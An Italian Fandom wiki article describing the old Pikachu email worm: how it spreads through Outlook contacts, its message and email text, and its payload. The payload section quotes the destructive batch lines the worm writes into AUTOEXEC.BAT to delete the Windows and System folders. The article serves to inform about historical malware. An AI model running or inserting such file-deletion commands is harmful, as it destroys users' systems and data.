FANDOM


Email-Worm.Win32.Pikachu, oppure semplicemente Pikachu, è un worm che si diffonde tramite email, scritto su Visual Basic 6.0. Si tratta del primo worm rivolto ai giovani.

ComportamentoModifica

Così chiamato in onore del personaggio omonimo della serie Pokémon, il worm si diffonde su Internet come email, utilizzando Microsoft Outlook e allegando un file di nome "PikachuPokemon.exe", la cui icona è un Pikachu disegnato approssimativamente. Il worm in sé è un file eseguibile Win32 PE, le cui dimensioni sono di circa 32 kilobyte.

Quando il virus è eseguito, per prima cosa sovrascrive il file originale C:\AUTOEXEC.BAT con delle istruzioni che cancelleranno tutti i file nella cartella Windows e nella sottocartella di sistema. Esso mostra un'immagine di Pikachu e il testo seguente:

Between millions of people
around the world I found you.
Don't forget to remember this day
every time MY FRIEND!

Visit us at http://www.pikachu.com

Il worm cerca tra la rubrica di Microsoft Outlook e crea delle lettere per gli indirizzi email nella cartella Outlook:

Pikachu Virus Icon

L'icona

Soggetto:
Pikachu Pokemon.

Testo:
Great Friend!

Pikachu from Pokemon Theme have some friendly
words to say.
Visit Pikachu at http://www.pikachu.com

See you.

E ad ogni lettera, il worm si autoallega come il file PikachuPokemon.exe. Tuttavia, l'utente potrebbe capire che non si tratta di un prodotto genuino, per via dell'utilizzo scorretto della grammatica.

Il sito mostrato nelle email (http://www.pikachu.com/) reindirizza alla voce di Pikachu nel sito del Pokédex.

Il worm è inviato a tutti nella rubrica dell'utente e aggiunge le seguenti linee al file AUTOEXEC.BAT, che si trova nella directory root del drive su cui Windows 95/98/ME è installato (generalmente C:\autoexec.bat). Queste sono le linee aggiunte:

@echo off
del C:\WINDOWS\*.*
del C:\WINDOWS\SYSTEM\*.*

PayloadModifica

Il suo payload è attivato dopo il riavvio del computer. Secondo il file batch sovrascritto dal worm, questi tenta di cancellare tutti i file nella cartella C:\WINDOWS e anche nella cartella SYSTEM, ma il sistema chiederà all'utente se vuole cancellare i file, facendogli notare che alcuni file sono stati modificati maliziosamente. Il payload non ha effetto neanche nel caso in cui la cartella Windows non sia in C:\WINDOWS.

Lo sapevi?Modifica

Il comando di cancellazione dei file è sempre indotto ad essere emesso nell'interfaccia grafica di Windows (ma non nella riga di comando); tuttavia, come misura di sicurezza, il sistema chiederà all'utente se vuole veramente cancellare tutti i file in una qualsiasi cartella. Ecco alcuni esempi di cancellazione dei file in modalità riga di comando:

Esecuzione senza prompt:

C:\MYFOLDER>del myfile.doc

C:\MYFOLDER>del myfile.*

C:\MYFOLDER>del *.doc

Prompt prima dell'esecuzione:

C:\MYFOLDER>del *.*

Tuttavia, nella versione DOS della riga di comando, inclusi i sistemi Windows 9x, è impossibile schivare il prompt.

Ad blocker interference detected!


Wikia is a free-to-use site that makes money from advertising. We have a modified experience for viewers using ad blockers

Wikia is not accessible if you’ve made further modifications. Remove the custom ad blocker rule(s) and the page will load as expected.